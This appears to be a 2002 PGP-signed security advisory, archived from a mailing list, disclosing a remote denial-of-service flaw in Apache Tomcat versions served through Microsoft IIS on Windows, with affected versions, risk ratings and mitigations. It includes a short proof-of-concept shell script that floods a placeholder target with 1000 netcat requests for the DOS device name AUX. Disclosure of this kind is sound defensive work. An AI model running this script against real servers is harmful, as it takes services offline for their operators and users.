-----BEGIN PGP SIGNED MESSAGE----- <Title:> Apache Tomcat: Remote denial-of-service vulnerability <Date:> 2002-09-06 <State:> 2002-10-11 <Vendor response:> Vendor contacted on 2002-09-06. Vendor is verifying the problem since 2002-09-10. No news since then... <Operating Systems:> Microsoft Windows 2000 Microsoft Windows NT may be affected as well. <Software:> Apache Tomcat 3.3 Apache Tomcat 4.0.4 All versions prior to 4.1.x may be affected as well. Apache Tomcat 4.1.10 (and probably higher) is not affected. <Attack:> A remote attacker can bring the servlet engine to a standstill. <Description:> In combination with Microsoft's IIS, Apache Tomcat is vulnerable to a denial-of-service attack. An attacker can crash the tomcat engine with multiple (e.g. 1000) requests that contain DOS device names like AUX, LPT1, CON, PRN. Proof of concept code: When Tomcat is serving servlets and jsp's under /examples/servlet/, use :- - - - - --------8<---------------------------- #!/bin/sh for i in 1 2 3 4 5 6 7 8 9 0 ; do for j in 1 2 3 4 5 6 7 8 9 0 ; do for k in 1 2 3 4 5 6 7 8 9 0 ; do echo -e "GET /examples/servlet/AUX HTTP/1.0\n\n"|nc <target_ip> <target-port> 2>1 >/dev/null & done done done - - - - --------8<---------------------------- This attack works on a Microsoft IIS Web Server connecting the Tomcat engine via the ajp1.3 connector. Standalone Tomcat engines (connected via the http interface on port 8080) are not vulnerable. <Risc:> Probability of an attack: HIGH Damage probability: MEDIUM-HIGH <Recommendation:> 1) Do not use Apache software on Microsoft operating systems. 2) When using Apache with IIS, enable the URLScan Filter to filter DOS device names from HTTP Requests. 3) Update to Apache Tomcat 4.1.x Author: Olaf Schulz olaf.schulz@t-systems.com http://www.dcert.de -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.3 iQEVAwUBPaanhhAj4oS8JNNNAQGAywgAgbNtMnf54MsqozQsxuJDfR2oU67qUXMf dMbt7DuyxkRr8sS4+u6vmTvv3v/Da1IfiwlOZcvaRLh+r3+lO1nJUoUZeIVjWW8b tat0uPKNRxA7b/DJpcQLkohewurDPQlyTV5dJqJpZp6Q8YzRAHIi1WqL4fnZAb6o fMjIft7MVNs2y/CVpQmofdh4ZTmY0tPdifKIyhxdVBSCpgBES4dZwxX41j9PcHeK YJpuxm+d6c0PsbbmY5S5BPPBKyg87mQcOHs2bN0JCaxwHoLiXx8zLCQBkhB1xAD7 0y4u8zMXNT5QVqaOeBig+GFackal6b0Qi+8XSDPZRpiJ8kvywz2maQ== =+2dL -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Fri Oct 11 2002 - 10:03:38 PDT